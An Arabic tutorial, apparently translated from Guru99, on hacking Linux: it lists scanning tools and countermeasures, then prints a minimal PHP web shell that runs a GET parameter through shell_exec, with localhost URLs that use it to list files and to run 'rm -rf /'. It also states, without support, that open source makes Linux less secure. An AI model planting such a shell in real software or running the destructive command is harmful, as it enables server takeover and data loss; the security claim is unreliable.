اختراق نظام التشغيل Linux: القرصنة باستخدام Ubuntu (الأوامر التعليمية)
لينكس هو نظام التشغيل الأكثر استخدامًا على الإطلاق، وخاصة لخوادم الويب. وهو مفتوح المصدر؛ وهذا يعني أن أي شخص يمكنه الوصول إلى الكود المصدر. وهذا يجعله أقل أمانًا مقارنة بأنظمة التشغيل الأخرى حيث يمكن للمهاجمين دراسة الكود المصدر للعثور على نقاط الضعف. لينكس للهاكرز يدور حول استغلال نقاط الضعف هذه للوصول غير المصرح به إلى النظام.
في هذه المقالة سنعرفك على ماهية نظام Linux، ونقاط الضعف الأمنية فيه، والاختراق بها Ubuntu والتدابير المضادة التي يمكنك اتخاذها.
ملاحظة سريعة على لينكس
Linux هو نظام تشغيل مفتوح المصدرهناك العديد من توزيعات أنظمة التشغيل المستندة إلى Linux مثل Redhat وFedora و Ubuntu، إلخ. على عكس أنظمة التشغيل الأخرى، يعتبر لينكس أقل أمانًا عندما يتعلق الأمر بالأمن. وذلك لأن الكود المصدر متاح مجانًا، لذا من السهل دراسته بحثًا عن نقاط الضعف واستغلالها مقارنة بأنظمة التشغيل الأخرى التي ليست مفتوحة المصدر. يمكن استخدام لينكس كنظام تشغيل للخادم أو سطح المكتب أو الجهاز اللوحي أو الجهاز المحمول.
يمكن تشغيل برامج Linux باستخدام واجهة المستخدم الرسومية أو الأوامر. أوامر Linux لـ Kali Linux تعتبر القرصنة أكثر فعالية وكفاءة مقارنة باستخدام واجهة المستخدم الرسومية. لهذا السبب، من المفيد معرفة أوامر Linux الأساسية للقرصنة.
الرجوع إلى هذه الدروس https://www.guru99.com/unix-linux-tutorial.html حول كيفية البدء Kali Linux الخارقة.
أدوات اختراق لينكس
- Nessus– يمكن استخدام هذه الأداة ل Ubuntu يمكن العثور على الاختراق وإعدادات تكوين المسح والتصحيحات والشبكات وما إلى ذلك على https://www.tenable.com/products/nessus
- نماب. يمكن استخدام هذه الأداة لمراقبة المضيفين الذين يعملون على الخادم والخدمات التي يستخدمونها. ويمكن استخدامه أيضًا للبحث عن المنافذ. يمكن العثور عليها في https://nmap.org/
- سارا - SARA هو اختصار لـ Security Auditor's Research Assistant. كما يوحي الاسم، يمكن استخدام هذه الأداة لتدقيق الشبكات ضد التهديدات مثل حقن SQL، XSS وما إلى ذلك ويمكن العثور عليها على http://www-arc.com/sara/sara.html
القائمة أعلاه ليست شاملة؛ فهو يعطيك فكرة عن الأدوات المتاحة ل Ubuntu اختراق واختراق أنظمة لينكس.
كيفية منع اختراقات لينكس
يستغل اختراق نظام Linux نقاط الضعف في نظام التشغيل. ويمكن للمؤسسة أن تتبنى السياسة التالية لحماية نفسها من مثل هذه الهجمات.
- إدارة التصحيح- تعمل التصحيحات على إصلاح الأخطاء التي يستغلها المهاجمون لاختراق النظام. ستضمن سياسة إدارة التصحيح الجيدة أنك تقوم باستمرار بتطبيق التصحيحات ذات الصلة على نظامك.
- التكوين الصحيح لنظام التشغيل– تستغل ثغرات أخرى نقاط الضعف في تكوين الخادم. يجب تعطيل أسماء المستخدمين غير النشطة والبرامج الضارة. يجب تغيير الإعدادات الافتراضية مثل كلمات المرور الشائعة للتطبيقات وأسماء المستخدمين الافتراضية وبعض أرقام المنافذ.
- نظام كشف التسلل– يمكن استخدام هذه الأدوات للكشف عن الوصول غير المصرح به إلى النظام. تتمتع بعض الأدوات بالقدرة على اكتشاف مثل هذه الهجمات ومنعها.
نشاط القرصنة: هاك أ Ubuntu نظام لينكس باستخدام لغة PHP
في هذا السيناريو العملي، سوف نتعلم كيفية الاختراق باستخدام Ubuntu وسنزودك بالمعلومات الأساسية حول كيفية الاستخدام PHP لتسوية لينكس. لن نستهدف أي ضحية. إذا كنت ترغب في تجربته، يمكنك تثبيت LAMPP على جهازك المحلي.
تأتي لغة PHP مع وظيفتين يمكن استخدامهما لتنفيذ أوامر اختراق Linux. يحتوي على وظائف exec() وshell_exec(). تقوم الدالة exec() بإرجاع السطر الأخير من مخرجات الأمر بينما تقوم الدالة shell_exec() بإرجاع النتيجة الكاملة للأمر كسلسلة.
ولأغراض العرض التوضيحي، لنفترض أن مدير المهاجم يقوم بتحميل الملف التالي على خادم الويب.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
هنا،
يحصل البرنامج النصي أعلاه على الأمر من متغير GET المسمى cmd. يتم تنفيذ الأمر باستخدام shell_exec() ويتم إرجاع النتائج في المتصفح.
يمكن استغلال الكود أعلاه باستخدام ما يلي URL
http://localhost/cp/konsole.php?cmd=ls%20-l
هنا،
- "...konsole.php?cmd=ls%20-l"يعين القيمة ls –l للمتغير cmd.
الأمر في Ubuntu سيتم تنفيذ القرصنة ضد الخادم كما
shell_exec('ls -l') ;
يؤدي تنفيذ الكود أعلاه على خادم الويب إلى نتائج مشابهة لما يلي.
يعرض الأمر أعلاه ببساطة الملفات الموجودة في الدليل الحالي والأذونات
لنفترض أن المهاجم أصدر الأمر التالي
rm -rf /
هنا،
- يقوم "rm" بإزالة الملفات
- "rf" يجعل الأمر rm يعمل في الوضع العودي. حذف كافة المجلدات والملفات
- "/" يوجه الأمر لبدء حذف الملفات من الدليل الجذر
الهجوم URL سيبدو الأمر على هذا النحو تقريبًا
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
ملخص
- Linux هو نظام تشغيل شائع للخوادم وأجهزة الكمبيوتر المكتبية والأجهزة اللوحية والأجهزة المحمولة.
- لينكس مفتوح المصدر، ويمكن لأي شخص الحصول على الكود المصدري. وهذا يجعل من السهل اكتشاف نقاط الضعف. إنه أحد أفضل أنظمة التشغيل للمتسللين.
- أوامر القرصنة الأساسية والشبكات في Ubuntu تعتبر ذات قيمة بالنسبة لقراصنة Linux.
- نقاط الضعف هي نقطة ضعف يمكن استغلالها لاختراق النظام.
- يمكن أن يساعد الأمان الجيد في حماية النظام من اختراق المهاجم.

